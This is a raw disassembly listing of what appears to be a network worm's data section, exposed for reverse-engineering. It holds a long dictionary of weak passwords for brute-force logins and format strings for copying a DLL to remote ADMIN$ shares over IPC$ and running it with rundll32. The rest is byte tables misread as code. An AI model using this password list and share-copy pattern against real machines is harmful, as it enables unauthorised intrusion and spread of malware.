a6666666 db '6666666',0 ; DATA XREF: .text:009B938C�o
a666666 db '666666',0 ; DATA XREF: .text:009B9388�o
align 10h
a66666 db '66666',0 ; DATA XREF: .text:009B9384�o
align 4
a6666 db '6666',0 ; DATA XREF: .text:009B9380�o
align 10h
a666 db '666',0 ; DATA XREF: .text:009B937C�o
a66 db '66',0 ; DATA XREF: .text:009B9378�o
align 4
a6: ; DATA XREF: .text:009B9374�o
unicode 0, <6>,0
a55555555 db '55555555',0 ; DATA XREF: .text:009B9370�o
align 4
a5555555 db '5555555',0 ; DATA XREF: .text:009B936C�o
a555555 db '555555',0 ; DATA XREF: .text:009B9368�o
align 4
a55555 db '55555',0 ; DATA XREF: .text:009B9364�o
align 10h
a5555 db '5555',0 ; DATA XREF: .text:009B9360�o
align 4
a555 db '555',0 ; DATA XREF: .text:009B935C�o
a55 db '55',0 ; DATA XREF: .text:009B9358�o
align 10h
a5: ; DATA XREF: .text:009B9354�o
unicode 0, <5>,0
a44444444 db '44444444',0 ; DATA XREF: .text:009B9350�o
align 10h
a4444444 db '4444444',0 ; DATA XREF: .text:009B934C�o
a444444 db '444444',0 ; DATA XREF: .text:009B9348�o
align 10h
a44444 db '44444',0 ; DATA XREF: .text:009B9344�o
align 4
a4444 db '4444',0 ; DATA XREF: .text:009B9340�o
align 10h
a444 db '444',0 ; DATA XREF: .text:009B933C�o
a44 db '44',0 ; DATA XREF: .text:009B9338�o
align 4
a4: ; DATA XREF: .text:009B9334�o
unicode 0, <4>,0
a33333333 db '33333333',0 ; DATA XREF: .text:009B9330�o
align 4
a3333333 db '3333333',0 ; DATA XREF: .text:009B932C�o
a333333 db '333333',0 ; DATA XREF: .text:009B9328�o
align 4
a33333 db '33333',0 ; DATA XREF: .text:009B9324�o
align 10h
a3333 db '3333',0 ; DATA XREF: .text:009B9320�o
align 4
a333 db '333',0 ; DATA XREF: .text:009B931C�o
a33 db '33',0 ; DATA XREF: .text:009B9318�o
align 10h
a3: ; DATA XREF: .text:009B9314�o
unicode 0, <3>,0
a22222222 db '22222222',0 ; DATA XREF: .text:009B9310�o
align 10h
a2222222 db '2222222',0 ; DATA XREF: .text:009B930C�o
a222222 db '222222',0 ; DATA XREF: .text:009B9308�o
align 10h
a22222 db '22222',0 ; DATA XREF: .text:009B9304�o
align 4
a2222 db '2222',0 ; DATA XREF: .text:009B9300�o
align 10h
a222 db '222',0 ; DATA XREF: .text:009B92FC�o
a22 db '22',0 ; DATA XREF: .text:009B92F8�o
align 4
a2_0: ; DATA XREF: .text:009B92F4�o
unicode 0, <2>,0
a11111111 db '11111111',0 ; DATA XREF: .text:009B92F0�o
align 4
a1111111 db '1111111',0 ; DATA XREF: .text:009B92EC�o
a111111 db '111111',0 ; DATA XREF: .text:009B92E8�o
align 4
a11111 db '11111',0 ; DATA XREF: .text:009B92E4�o
align 10h
a1111 db '1111',0 ; DATA XREF: .text:009B92E0�o
align 4
a111 db '111',0 ; DATA XREF: .text:009B92DC�o
a11 db '11',0 ; DATA XREF: .text:009B92D8�o
align 10h
a1: ; DATA XREF: sub_9B542A+8F�o
; .text:009B92D4�o
unicode 0, <1>,0
a00000000 db '00000000',0 ; DATA XREF: .text:009B92D0�o
align 10h
a0000000 db '0000000',0 ; DATA XREF: .text:009B92CC�o
a00000 db '00000',0 ; DATA XREF: .text:009B92C4�o
; .text:009B92C8�o
align 10h
a0000 db '0000',0 ; DATA XREF: .text:009B92C0�o
align 4
a000 db '000',0 ; DATA XREF: .text:009B92BC�o
a00 db '00',0 ; DATA XREF: .text:009B92B8�o
align 10h
a0987654321 db '0987654321',0 ; DATA XREF: .text:009B92B0�o
align 4
a987654321 db '987654321',0 ; DATA XREF: .text:009B92AC�o
align 4
a87654321 db '87654321',0 ; DATA XREF: .text:009B92A8�o
align 4
a7654321 db '7654321',0 ; DATA XREF: .text:009B92A4�o
a654321 db '654321',0 ; DATA XREF: .text:009B92A0�o
align 4
a54321 db '54321',0 ; DATA XREF: .text:009B929C�o
align 4
a4321 db '4321',0 ; DATA XREF: .text:009B9298�o
align 4
a321 db '321',0 ; DATA XREF: .text:009B9294�o
a21 db '21',0 ; DATA XREF: .text:009B9290�o
align 4
a12 db '12',0 ; DATA XREF: .text:009B928C�o
align 10h
aFuck db 'fuck',0 ; DATA XREF: .text:009B9288�o
align 4
aZzzzz db 'zzzzz',0 ; DATA XREF: .text:009B9284�o
align 10h
aZzzz db 'zzzz',0 ; DATA XREF: .text:009B9280�o
align 4
aZzz db 'zzz',0 ; DATA XREF: .text:009B927C�o
aXxxxx db 'xxxxx',0 ; DATA XREF: .text:009B9278�o
align 4
aXxxx db 'xxxx',0 ; DATA XREF: .text:009B9274�o
align 4
aXxx db 'xxx',0 ; DATA XREF: .text:009B9270�o
aQqqqq db 'qqqqq',0 ; DATA XREF: .text:009B926C�o
align 4
aQqqq db 'qqqq',0 ; DATA XREF: .text:009B9268�o
align 10h
aQqq db 'qqq',0 ; DATA XREF: .text:009B9264�o
aAaaaa db 'aaaaa',0 ; DATA XREF: .text:009B9260�o
align 4
aAaaa db 'aaaa',0 ; DATA XREF: .text:009B925C�o
align 4
aAaa_0 db 'aaa',0 ; DATA XREF: .text:009B9258�o
aSql db 'sql',0 ; DATA XREF: .text:009B9254�o
aFile db 'file',0 ; DATA XREF: .text:009B9250�o
align 4
aWeb db 'web',0 ; DATA XREF: .text:009B924C�o
aFoo db 'foo',0 ; DATA XREF: .text:009B9248�o
aJob db 'job',0 ; DATA XREF: .text:009B9244�o
aHome db 'home',0 ; DATA XREF: .text:009B9240�o
align 4
aWork db 'work',0 ; DATA XREF: .text:009B923C�o
align 10h
aIntranet db 'intranet',0 ; DATA XREF: .text:009B9238�o
align 4
aController db 'controller',0 ; DATA XREF: .text:009B9234�o
align 4
aKiller db 'killer',0 ; DATA XREF: .text:009B9230�o
align 10h
aGames db 'games',0 ; DATA XREF: .text:009B922C�o
align 4
aPrivate db 'private',0 ; DATA XREF: .text:009B9228�o
aMarket db 'market',0 ; DATA XREF: .text:009B9224�o
align 4
aCoffee db 'coffee',0 ; DATA XREF: .text:009B9220�o
align 10h
aCookie db 'cookie',0 ; DATA XREF: .text:009B921C�o
align 4
aForever db 'forever',0 ; DATA XREF: .text:009B9218�o
aFreedom db 'freedom',0 ; DATA XREF: .text:009B9214�o
aStudent db 'student',0 ; DATA XREF: .text:009B9210�o
aAccount db 'account',0 ; DATA XREF: .text:009B920C�o
aAcademia db 'academia',0 ; DATA XREF: .text:009B9208�o
align 4
aFiles db 'files',0 ; DATA XREF: .text:009B9204�o
align 4
aWindows db 'windows',0 ; DATA XREF: .text:009B9200�o
aMonitor db 'monitor',0 ; DATA XREF: .text:009B91FC�o
aUnknown db 'unknown',0 ; DATA XREF: .text:009B91F8�o
aAnything db 'anything',0 ; DATA XREF: .text:009B91F4�o
align 10h
aLetitbe db 'letitbe',0 ; DATA XREF: .text:009B91F0�o
aLetmein db 'letmein',0 ; DATA XREF: .text:009B91EC�o
aDomain db 'domain',0 ; DATA XREF: .text:009B91E8�o
align 4
aAccess db 'access',0 ; DATA XREF: .text:009B91E4�o
align 10h
aMoney db 'money',0 ; DATA XREF: .text:009B91E0�o
align 4
aCampus db 'campus',0 ; DATA XREF: .text:009B91DC�o
align 10h
aExplorer db 'explorer',0 ; DATA XREF: .text:009B91D8�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .text:009B91D4�o
align 4
aCustomer db 'customer',0 ; DATA XREF: .text:009B91D0�o
align 4
aCluster db 'cluster',0 ; DATA XREF: .text:009B91CC�o
aNobody db 'nobody',0 ; DATA XREF: .text:009B91C8�o
align 4
aCodeword db 'codeword',0 ; DATA XREF: .text:009B91C4�o
align 10h
aCodename db 'codename',0 ; DATA XREF: .text:009B91C0�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .text:009B91BC�o
align 4
aDesktop db 'desktop',0 ; DATA XREF: .text:009B91B8�o
aSecurity db 'security',0 ; DATA XREF: .text:009B91B4�o
align 4
aSecure db 'secure',0 ; DATA XREF: .text:009B91B0�o
align 4
aPublic db 'public',0 ; DATA XREF: .text:009B91AC�o
align 4
aSystem db 'system',0 ; DATA XREF: .text:009B91A8�o
align 4
aShadow db 'shadow',0 ; DATA XREF: .text:009B91A4�o
align 4
aOffice db 'office',0 ; DATA XREF: .text:009B91A0�o
align 4
aSupervisor db 'supervisor',0 ; DATA XREF: .text:009B919C�o
align 10h
aSuperuser db 'superuser',0 ; DATA XREF: .text:009B9198�o
align 4
aShare db 'share',0 ; DATA XREF: .text:009B9194�o
align 4
aSuper db 'super',0 ; DATA XREF: .text:009B9190�o
align 4
aSecret db 'secret',0 ; DATA XREF: .text:009B918C�o
align 4
aServer db 'server',0 ; DATA XREF: .text:009B9188�o
align 4
aComputer db 'computer',0 ; DATA XREF: .text:009B9184�o
align 4
aOwner db 'owner',0 ; DATA XREF: .text:009B9180�o
align 10h
aBackup db 'backup',0 ; DATA XREF: .text:009B917C�o
align 4
aDatabase db 'database',0 ; DATA XREF: .text:009B9178�o
align 4
aLotus db 'lotus',0 ; DATA XREF: .text:009B9174�o
align 4
aOracle db 'oracle',0 ; DATA XREF: .text:009B9170�o
align 4
aBusiness db 'business',0 ; DATA XREF: .text:009B916C�o
align 10h
aManager db 'manager',0 ; DATA XREF: .text:009B9168�o
aTemporary db 'temporary',0 ; DATA XREF: .text:009B9164�o
align 4
aIhavenopass db 'ihavenopass',0 ; DATA XREF: .text:009B9160�o
aNothing db 'nothing',0 ; DATA XREF: .text:009B915C�o
aNopassword db 'nopassword',0 ; DATA XREF: .text:009B9158�o
align 4
aNopass db 'nopass',0 ; DATA XREF: .text:009B9154�o
align 4
aInternet db 'Internet',0 ; DATA XREF: .text:009B9150�o
align 4
aInternet_0 db 'internet',0 ; DATA XREF: .text:009B914C�o
align 4
aExample db 'example',0 ; DATA XREF: .text:009B9148�o
aSample db 'sample',0 ; DATA XREF: .text:009B9144�o
align 4
aLove123 db 'love123',0 ; DATA XREF: .text:009B9140�o
aBoss123 db 'boss123',0 ; DATA XREF: .text:009B913C�o
aWork123 db 'work123',0 ; DATA XREF: .text:009B9138�o
aHome123 db 'home123',0 ; DATA XREF: .text:009B9134�o
aMypc123 db 'mypc123',0 ; DATA XREF: .text:009B9130�o
aTemp123 db 'temp123',0 ; DATA XREF: .text:009B912C�o
aTest123 db 'test123',0 ; DATA XREF: .text:009B9128�o
aQwe123 db 'qwe123',0 ; DATA XREF: .text:009B9124�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:009B9120�o
align 4
aPw123 db 'pw123',0 ; DATA XREF: .text:009B911C�o
align 4
aRoot123 db 'root123',0 ; DATA XREF: .text:009B9118�o
aPass123 db 'pass123',0 ; DATA XREF: .text:009B9114�o
aPass12 db 'pass12',0 ; DATA XREF: .text:009B9110�o
align 4
aPass1 db 'pass1',0 ; DATA XREF: .text:009B910C�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: .text:009B9108�o
align 10h
aAdmin12 db 'admin12',0 ; DATA XREF: .text:009B9104�o
aAdmin1 db 'admin1',0 ; DATA XREF: .text:009B9100�o
align 10h
aPassword123 db 'password123',0 ; DATA XREF: .text:009B90FC�o
aPassword12 db 'password12',0 ; DATA XREF: .text:009B90F8�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .text:009B90F4�o
align 4
aDefault db 'default',0 ; DATA XREF: .text:009B90F0�o
aFoobar db 'foobar',0 ; DATA XREF: .text:009B90EC�o
align 4
aFoofoo db 'foofoo',0 ; DATA XREF: .text:009B90E8�o
align 4
aTemptemp db 'temptemp',0 ; DATA XREF: .text:009B90E4�o
align 4
aTemp db 'temp',0 ; DATA XREF: .text:009B90E0�o
align 10h
aTesttest db 'testtest',0 ; DATA XREF: .text:009B90DC�o
align 4
aTest db 'test',0 ; DATA XREF: .text:009B90D8�o
align 4
aRootroot db 'rootroot',0 ; DATA XREF: .text:009B90D4�o
align 10h
aRoot db 'root',0 ; DATA XREF: .text:009B90D0�o
align 4
aAdminadmin db 'adminadmin',0 ; DATA XREF: .text:009B90CC�o
align 4
aMypassword db 'mypassword',0 ; DATA XREF: .text:009B90C8�o
align 10h
aMypass db 'mypass',0 ; DATA XREF: .text:009B90C4�o
align 4
aPass db 'pass',0 ; DATA XREF: .text:009B90C0�o
align 10h
aLogin db 'Login',0 ; DATA XREF: .text:009B90BC�o
align 4
aLogin_0 db 'login',0 ; DATA XREF: .text:009B90B8�o
align 10h
aPassword db 'Password',0 ; DATA XREF: .text:009B90B4�o
align 4
aPassword_0 db 'password',0 ; DATA XREF: .text:009B90B0�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .text:009B90AC�o
align 10h
aZxcvbn db 'zxcvbn',0 ; DATA XREF: .text:009B90A8�o
align 4
aZxcvb db 'zxcvb',0 ; DATA XREF: .text:009B90A4�o
align 10h
aZxccxz db 'zxccxz',0 ; DATA XREF: .text:009B90A0�o
align 4
aZxcxz db 'zxcxz',0 ; DATA XREF: .text:009B909C�o
align 10h
aQazwsxedc db 'qazwsxedc',0 ; DATA XREF: .text:009B9098�o
align 4
aQazwsx db 'qazwsx',0 ; DATA XREF: .text:009B9094�o
align 4
aQ1w2e3 db 'q1w2e3',0 ; DATA XREF: .text:009B9090�o
align 4
aQweasdzxc db 'qweasdzxc',0 ; DATA XREF: .text:009B908C�o
align 4
aAsdfgh db 'asdfgh',0 ; DATA XREF: .text:009B9088�o
align 10h
aAsdzxc db 'asdzxc',0 ; DATA XREF: .text:009B9084�o
align 4
aAsddsa db 'asddsa',0 ; DATA XREF: .text:009B9080�o
align 10h
aAsdsa db 'asdsa',0 ; DATA XREF: .text:009B907C�o
align 4
aQweasd db 'qweasd',0 ; DATA XREF: .text:009B9078�o
align 10h
aQwerty db 'qwerty',0 ; DATA XREF: .text:009B9074�o
align 4
aQweewq db 'qweewq',0 ; DATA XREF: .text:009B9070�o
align 10h
aQwewq db 'qwewq',0 ; DATA XREF: .text:009B906C�o
align 4
aNimda db 'nimda',0 ; DATA XREF: .text:009B9068�o
align 10h
aAdministrator db 'administrator',0 ; DATA XREF: .text:009B9064�o
align 10h
aAdmin db 'Admin',0 ; DATA XREF: .text:009B9060�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: .text:009B905C�o
align 10h
aA1b2c3 db 'a1b2c3',0 ; DATA XREF: .text:009B9058�o
align 4
a1q2w3e db '1q2w3e',0 ; DATA XREF: .text:009B9054�o
align 10h
a1234qwer db '1234qwer',0 ; DATA XREF: .text:009B9050�o
align 4
a1234abcd db '1234abcd',0 ; DATA XREF: .text:009B904C�o
align 4
a123asd db '123asd',0 ; DATA XREF: .text:009B9048�o
align 10h
a123qwe db '123qwe',0 ; DATA XREF: .text:009B9044�o
align 4
a123abc db '123abc',0 ; DATA XREF: .text:009B9040�o
align 10h
a123321 db '123321',0 ; DATA XREF: .text:009B903C�o
align 4
a12321 db '12321',0 ; DATA XREF: .text:009B9038�o
align 10h
a123123 db '123123',0 ; DATA XREF: .text:009B9034�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .text:009B9030�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .text:009B902C�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .text:009B9028�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:009B9024�o
a123456 db '123456',0 ; DATA XREF: .text:009B9020�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:009B901C�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:009B9018�o
align 4
a123 db '123',0 ; DATA XREF: .text:009B9014�o
; wchar_t aSIpc
aSIpc: ; DATA XREF: sub_9A827D+12�o
; sub_9A82BC+13�o
unicode 0, <\\%s\IPC$>,0
; wchar_t Str
Str dw 0 ; DATA XREF: sub_9A82BC+54�o
; sub_9AD062+1F4�o
align 4
; wchar_t aS
aS: ; DATA XREF: sub_9A8326+249�o
unicode 0, <\\%s>,0
align 4
; wchar_t aRundll32_exeSS
aRundll32_exeSS: ; DATA XREF: sub_9A8326+230�o
unicode 0, <rundll32.exe %s,%s>,0
align 4
; wchar_t aSAdminSystem32
aSAdminSystem32: ; DATA XREF: sub_9A8326+102�o
; sub_9A8326+118�o
unicode 0, <\\%s\ADMIN$\System32\%s>,0
; wchar_t aDll
aDll: ; DATA XREF: sub_9A8326+C2�o
; sub_9A8326+E7�o
unicode 0, <dll>,0
; wchar_t a_
a_: ; DATA XREF: sub_9A8326+8F�o
unicode 0, <.>,0
dword_9A2F88 dd 0C08956A1h, 11D11CD3h, 8000C5B1h, 0E27C15Fh ; DATA XREF: sub_9A8A72+8D�o
dword_9A2F98 dd 20404h, 0 ; DATA XREF: sub_9A8A72+3E�o
dd 0C0h, 46000000h
; IID rclsid
rclsid dd 5C63C1ADh ; Data1 ; DATA XREF: sub_9A8C1B+49�o
dw 3956h ; Data2
dw 4FF8h ; Data3
db 84h, 86h, 40h, 3, 47h, 58h, 31h, 5Bh; Data4
; IID riid
riid dd 0C08956B7h ; Data1 ; DATA XREF: sub_9A8C1B+41�o
dw 1CD3h ; Data2
dw 11D1h ; Data3
db 0B1h, 0C5h, 0, 80h, 5Fh, 0C1h, 27h, 0Eh; Data4
stru_9A2FC8 _msEH <0FFFFFFFFh, offset loc_9A8C8D, offset loc_9A8C91>
; DATA XREF: sub_9A8C1B+2�o
align 8
dword_9A2FD8 dd 510CDD60h ; DATA XREF: sub_9A8DB4:loc_9A8DD1�r
dword_9A2FDC dd 510CDD7Fh ; DATA XREF: sub_9A8DB4+25�r
db 0
db 68h, 0C7h, 5Bh
; ---------------------------------------------------------------------------
jmp fword ptr [eax-39h]
; ---------------------------------------------------------------------------
db 5Bh
db 0
db 0D1h, 58h, 0C0h
db 0FFh
db 0D1h, 58h, 0C0h
db 0
db 58h, 0F2h, 0CFh
db 0FFh
db 58h, 0F2h, 0CFh
db 0C0h ; À
db 2Bh, 2Ah, 0Ch
db 0C7h ; Ç
db 2Bh, 2Ah, 0Ch
db 0
db 0B5h, 84h, 43h
db 0FFh
db 0B5h, 84h, 43h
db 0
db 34h, 77h, 42h
db 0FFh
db 34h, 77h, 42h
db 0
db 0C4h, 17h, 0D0h
db 7Fh ;
db 0C4h, 17h, 0D0h
db 0
align 2
dw 8DCAh
db 0FFh
db 0FFh, 0CAh, 8Dh
db 0
align 2
dw 8277h
db 0FFh
db 0FFh, 77h, 82h
db 0
align 2
dw 8A2Ah
db 0FFh
; ---------------------------------------------------------------------------
jmp fword ptr [edx]
; ---------------------------------------------------------------------------
db 8Ah
db 0
align 2
dw 82C8h
db 0FFh
db 0FFh, 0C8h, 82h
db 0
align 2
dw 9B23h
db 0FFh
; ---------------------------------------------------------------------------
jmp dword ptr [ebx]
; ---------------------------------------------------------------------------
db 9Bh
db 0
db 0A7h, 0A6h, 0CDh
; ---------------------------------------------------------------------------
jmp dword ptr [edi+3900CDA6h]
; ---------------------------------------------------------------------------
dw 0D0D4h
db 0FFh
db 39h, 0D4h, 0D0h
db 0
db 98h, 0D4h, 0D0h
db 0FFh
db 9Bh, 0D4h, 0D0h
db 0
db 40h, 0F2h, 0D0h
db 0FFh
db 41h, 0F2h, 0D0h
db 0
db 85h, 0F3h, 0D0h
db 1Fh
db 85h, 0F3h, 0D0h
db 80h ; €
db 0E7h, 0F5h, 0D0h
db 9Fh ; Ÿ
db 0E7h, 0F5h, 0D0h
aPAPASp?Sp? db 'ÀØAßØAÀ™p?Ï™p?',0
db 0DAh, 7Dh, 3Fh
db 0FFh
db 0DAh, 7Dh, 3Fh
db 80h ; €
db 3Dh, 0D2h, 41h
db 0BFh ; ¿
db 3Dh, 0D2h, 41h
db 40h ; @
db 2Dh, 0CEh, 41h
db 7Fh ;
db 2Dh, 0CEh, 41h
db 0
db 0Eh, 0F6h, 41h
db 0FFh
db 0Eh, 0F6h, 41h
db 0
; ---------------------------------------------------------------------------
sub [esi+3Fh], dh
jmp fword ptr [ecx]
; ---------------------------------------------------------------------------
dw 3F76h
db 0
db 34h, 76h, 3Fh
db 0FFh
db 37h, 76h, 3Fh
db 0C8h ; È
db 0A5h, 0C8h, 41h
db 0CFh ; Ï
db 0A5h, 0C8h, 41h
db 0D0h ; Ð
db 98h, 0FDh, 0D0h
db 0DFh ; ß
db 98h, 0FDh, 0D0h
db 58h ; X
db 0D8h, 0FFh, 0D0h
db 5Fh ; _
db 0D8h, 0FFh, 0D0h
db 80h ; €
db 0Eh, 0BCh, 0CEh
db 0BFh ; ¿
db 0Eh, 0BCh, 0CEh
db 0C0h ; À
db 0Eh, 0BCh, 0CEh
db 0FFh
db 0Eh, 0BCh, 0CEh
db 60h ; `
db 0F6h, 0D8h, 41h
db 67h ; g
db 0F6h, 0D8h, 41h
db 80h ; €
db 53h ; S
db 11h
db 0CCh ; Ì
db 0BFh ; ¿
db 53h ; S
db 11h
db 0CCh ; Ì
db 0
db 0B6h ; ¶
db 0E8h ; è
db 0D0h ; Ð
db 0FFh
db 0B6h ; ¶
db 0E8h ; è
db 0D0h ; Ð
db 80h ; €
db 57h ; W
db 0E8h ; è
db 0D0h ; Ð
db 0FFh
db 57h ; W
db 0E8h ; è
db 0D0h ; Ð
db 58h ; X
db 7
db 20h
db 48h ; H
db 5Fh ; _
db 7, 20h, 48h
db 0D8h ; Ø
db 0BEh, 0E1h, 45h
db 0DFh ; ß
db 0BEh, 0E1h, 45h
db 60h ; `
db 17h, 0E6h, 45h
db 67h ; g
db 17h, 0E6h, 45h
db 60h ; `
db 17h, 76h, 0CCh
db 7Fh ;
db 17h, 76h, 0CCh
db 0
db 0D4h, 0C8h, 41h
db 0FFh
db 0D4h, 0C8h, 41h
db 0
db 91h, 62h, 0C1h
db 0FFh
db 91h, 62h, 0C1h
db 10h
db 8Ah, 17h, 0D4h
db 1Fh
db 8Ah, 17h, 0D4h
db 48h ; H
align 2
dw 50EFh
db 4Fh ; O
align 2
dw 50EFh
db 0E8h ; è
db 38h, 0, 0D5h
db 0EFh ; ï
db 38h, 0, 0D5h
db 90h
db 6Bh, 0, 0D5h
db 97h ; —
db 6Bh, 0, 0D5h
db 0C0h ; À
db 2Ch, 0B5h, 0Ch
db 0C7h ; Ç
db 2Ch, 0B5h, 0Ch
db 0B0h ; °
db 1Dh, 0B8h, 0Ch
db 0BFh ; ¿
db 1Dh, 0B8h, 0Ch
db 0
db 80h, 0BBh, 0C0h
db 0FFh
db 80h, 0BBh, 0C0h
db 0
db 80h, 0BBh, 0C0h
db 0FFh
db 80h, 0BBh, 0C0h
db 0B0h ; °
db 17h, 24h, 0Ch
db 0BFh ; ¿
db 17h, 24h, 0Ch
db 0
db 26h, 98h, 0Ch
db 7Fh ;
db 26h, 98h, 0Ch
db 30h ; 0
db 0C7h, 29h, 40h
db 37h ; 7
db 0C7h, 29h, 40h
db 0
db 97h, 29h, 40h
db 0FFh
aC@si@qi@0s?sAe db '—)@è¨)@ï¨)@0è',7,'Ð?è',7,'ЀEbCŸEbC@HbC_HbC •Z?¿•Z?',0
db 50h, 61h, 43h
db 0FFh
db 51h, 61h, 43h
db 40h ; @
db 15h, 0D8h, 41h
db 7Fh ;
db 15h, 0D8h, 41h
db 90h
db 39h, 0F2h, 48h
db 97h ; —
db 39h, 0F2h, 48h
db 20h
db 68h, 58h, 44h
db 27h ; '
db 68h ; h
db 58h ; X
db 44h ; D
db 0C0h ; À
db 0F2h ; ò
db 88h ; ˆ
db 63h ; c
db 0C7h ; Ç
db 0F2h ; ò
db 88h ; ˆ
db 63h ; c
db 0D8h ; Ø
db 52h, 59h, 44h
db 0DFh ; ß
db 52h, 59h, 44h
db 0
db 1, 54h, 0D8h
db 0FFh
db 1, 54h, 0D8h
db 48h ; H
db 71h, 0DBh, 45h
db 4Fh ; O
db 71h, 0DBh, 45h
db 80h ; €
db 14h, 35h, 4Bh
db 87h ; ‡
db 14h, 35h, 4Bh
db 70h ; p
db 8Ch, 5Dh, 42h
db 77h ; w
db 8Ch, 5Dh, 42h
db 0C0h ; À
db 16h, 5Ch, 42h
db 0CFh ; Ï
db 16h, 5Ch, 42h
db 0A0h ;
db 0E8h, 41h, 3Fh
db 0AFh ; ¯
db 0E8h, 41h, 3Fh
db 90h
db 0E8h, 41h, 3Fh
db 97h ; —
db 0E8h, 41h, 3Fh
db 30h ; 0
db 3Ch, 48h, 44h
db 37h ; 7
db 3Ch, 48h, 44h
db 80h ; €
db 95h, 5Ah, 3Fh
db 9Fh ; Ÿ
db 95h, 5Ah, 3Fh
db 70h ; p
db 5Dh, 41h, 3Fh
db 7Fh ;
db 5Dh, 41h, 3Fh
db 0
db 5Eh, 41h, 3Fh
db 0Fh
aA?A?oA?A?A? db '^A?`^A?o^A?(ܼÐ/ܼÐÐ^A?ß^A?',0
db 46h, 8Fh, 0D8h
db 0FFh
db 47h, 8Fh, 0D8h
db 0B0h ; °
db 97h, 0E1h, 46h
db 0B7h ; ·
db 97h, 0E1h, 46h
db 0
align 2
dw 836Bh
db 0FFh
; ---------------------------------------------------------------------------
jmp fword ptr [ebx-7Dh]
; ---------------------------------------------------------------------------
db 0
db 5Ah, 5Ch, 0C0h
db 0FFh
db 5Ah, 5Ch, 0C0h
db 0
db 0E8h, 69h, 0C6h
db 0FFh
db 0EBh, 69h, 0C6h
db 0
db 3Ah, 0E7h, 0CCh
db 0FFh
db 3Ah, 0E7h, 0CCh
db 0
db 4Dh, 8Ch, 0CCh
db 0FFh
db 4Dh, 8Ch, 0CCh
db 0
db 50h, 8Ch, 0CCh
db 0FFh
db 53h, 8Ch, 0CCh
db 0
db 1Ch, 3Ch, 0C7h
db 0FFh
db 1Ch, 3Ch, 0C7h
db 0
db 5Ah, 67h, 0C7h
db 0FFh
db 5Bh, 67h, 0C7h
db 0
db 7Ah, 67h, 0C7h
db 0FFh
db 7Ah, 67h, 0C7h
db 0
db 65h, 4Fh, 0CCh
; ---------------------------------------------------------------------------
jmp dword ptr [ebp+4Fh]
; ---------------------------------------------------------------------------
db 0CCh
db 0
db 43h, 0EDh, 0C0h
; ---------------------------------------------------------------------------
inc dword ptr [ebx-13h]
rol byte ptr [eax], 61h
mov esi, eax
jmp dword ptr [ecx-77h]
; ---------------------------------------------------------------------------
db 0C6h
db 0
db 87h, 4Fh, 0CCh
db 0FFh
db 87h, 4Fh, 0CCh
db 0
db 0B3h, 4Fh, 0CCh
db 0FFh
db 0B3h, 4Fh, 0CCh
db 0
db 0B4h, 4Fh, 0CCh
db 0FFh
db 0B5h, 4Fh, 0CCh
db 0
db 0BCh, 4Fh, 0CCh
db 0FFh
db 0BCh, 4Fh, 0CCh
db 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
dw 0CC4Fh
db 0FFh
db 0C5h, 4Fh, 0CCh
db 0
db 5Ch, 6, 0C7h
db 0FFh
db 5Eh, 6, 0C7h
db 0
db 7, 4Fh, 0CCh
db 0FFh
db 7, 4Fh, 0CCh
db 0
db 1Bh, 4Fh, 0CCh
db 0FFh
db 1Bh, 4Fh, 0CCh
db 0
; ---------------------------------------------------------------------------
dec edx
mov ah, 0C6h
dec dword ptr [ebx-4Ch]
mov byte ptr [eax], 5Fh
mov ah, 0C6h
jmp dword ptr [ecx-4Ch]
; ---------------------------------------------------------------------------
db 0C6h
db 0
db 0ECh, 0E7h, 0CCh
db 0FFh
db 0ECh, 0E7h, 0CCh
db 0
db 0Ah, 0F8h, 0CDh
db 0FFh
db 0Fh, 0F8h, 0CDh
db 0
db 3Fh, 0A3h, 0CDh
db 0FFh
db 3Fh, 0A3h, 0CDh
db 0
db 3Eh, 0A3h, 0CDh
db 0FFh
db 3Eh, 0A3h, 0CDh
db 0
align 2
dw 0CDA3h
db 0FFh
db 9Fh, 0A3h, 0CDh
db 0
db 29h, 0F8h, 0CDh
; ---------------------------------------------------------------------------
jmp fword ptr [ebx]
; ---------------------------------------------------------------------------
dw 0CDF8h
db 0
db 32h, 0F8h, 0CDh
db 0FFh
db 33h, 0F8h, 0CDh
db 0
db 3Dh, 0F8h, 0CDh
db 0FFh
db 3Fh, 0F8h, 0CDh
db 0
db 48h, 0F8h, 0CDh
db 0FFh
db 48h, 0F8h, 0CDh
db 0
db 0D4h, 0F8h, 0CDh
db 0FFh
db 0D7h, 0F8h, 0CDh
db 0
db 0E4h, 0F8h, 0CDh
; ---------------------------------------------------------------------------
jmp esp
; ---------------------------------------------------------------------------
dw 0CDF8h
db 0
db 0EBh, 0F8h, 0CDh
db 0FFh
db 0EBh, 0F8h, 0CDh
db 0
db 4Ch, 0E7h, 0CCh
db 0FFh
db 4Ch, 0E7h, 0CCh
db 0
db 0C0h, 0E7h, 0CCh
db 0FFh
db 0C0h, 0E7h, 0CCh
db 0
db 0C2h ; Â
db 0E7h ; ç
db 0CCh ; Ì
db 0FFh
db 0DFh, 0E7h, 0CCh
db 0
db 50h, 4Eh, 0CFh
db 0FFh
db 50h, 4Eh, 0CFh
db 0
db 51h, 4Eh, 0CFh
db 0FFh
db 51h, 4Eh, 0CFh
db 0
db 52h, 4Eh, 0CFh
db 0FFh
db 52h, 4Eh, 0CFh
db 0
db 0F3h, 0F8h, 0CDh
db 0FFh
db 0F4h, 0F8h, 0CDh
db 0
db 3, 75h, 0CFh
db 0FFh
db 3, 75h, 0CFh
db 0
db 75h, 12h, 0CFh
db 0FFh
db 75h, 12h, 0CFh
db 0
; ---------------------------------------------------------------------------
sbb ecx, [ebx-74E40030h]
rol byte ptr [eax], 1
aad 1Ch
sar edi, 1
aad 1Ch
rol dword ptr [eax], 1
inc esp
ror edi, 1
inc dword ptr [ecx+edx*8-31h]
add [eax+5Fh], ah
int 3 ; Trap to Debugger
jmp fword ptr [edi+5Fh]
; ---------------------------------------------------------------------------
align 4
db 0C0h ; À
